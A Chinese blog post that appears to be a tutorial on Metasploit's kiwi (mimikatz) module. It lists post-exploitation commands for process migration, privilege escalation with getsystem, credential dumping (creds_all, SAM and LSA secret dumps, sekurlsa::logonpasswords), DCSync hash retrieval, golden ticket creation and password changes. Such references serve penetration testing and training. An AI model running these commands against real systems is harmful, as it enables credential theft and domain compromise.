当前位置:   article > 正文

MSF中kiwi模块_msf kiwi修改密码

msf kiwi修改密码

Kiwi介绍

kiwi模块:
  mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system

msf进行进程迁移:

如果目标系统是64位的所以需要把meterpreter进程迁移到一个64位程序的进程中。

  1. 命令:
  2. migrate [PID]

模块使用前提:

  1. 提到system有两个方法:
  2.   一是当前的权限是administrator用户;
  3.   二是利用其它手段先提权到administrator用户。
  4. 然后administrator用户可以直接在meterpreter_shell中使用命令getsystem提权到system权限。

kiwi模块使用:

  1. load kiwi #加载kiwi模块
  2. help kiwi #查看kiwi模块的使用
  3. creds_all: #列举所有凭据
  4. creds_kerberos: #列举所有kerberos凭据
  5. creds_msv: #列举所有msv凭据
  6. creds_ssp: #列举所有ssp凭据
  7. creds_tspkg: #列举所有tspkg凭据
  8. creds_wdigest: #列举所有wdigest凭据
  9. dcsync: #通过DCSync检索用户帐户信息
  10. dcsync_ntlm: #通过DCSync检索用户帐户NTLM散列、SID和RID
  11. golden_ticket_create: #创建黄金票据
  12. kerberos_ticket_list: #列举kerberos票据
  13. kerberos_ticket_purge: #清除kerberos票据
  14. kerberos_ticket_use: #使用kerberos票据
  15. kiwi_cmd: #执行mimikatz的命令,后面接mimikatz.exe的命令
  16. lsa_dump_sam: #dump出lsa的SAM
  17. lsa_dump_secrets: #dump出lsa的密文
  18. password_change: #修改密码
  19. wifi_list: #列出当前用户的wifi配置文件
  20. wifi_list_shared: #列出共享wifi配置文件/编码

俩个常用的命令:

creds_all:
列举系统所有明文密码,列举所有凭据

kiwi_cmd:
kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe的命令

  1. 使用kiwi抓取明文密码:
  2. kiwi_cmd sekurlsa::logonpasswords

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/article/detail/41146
推荐阅读
相关标签
  

闽ICP备14008679号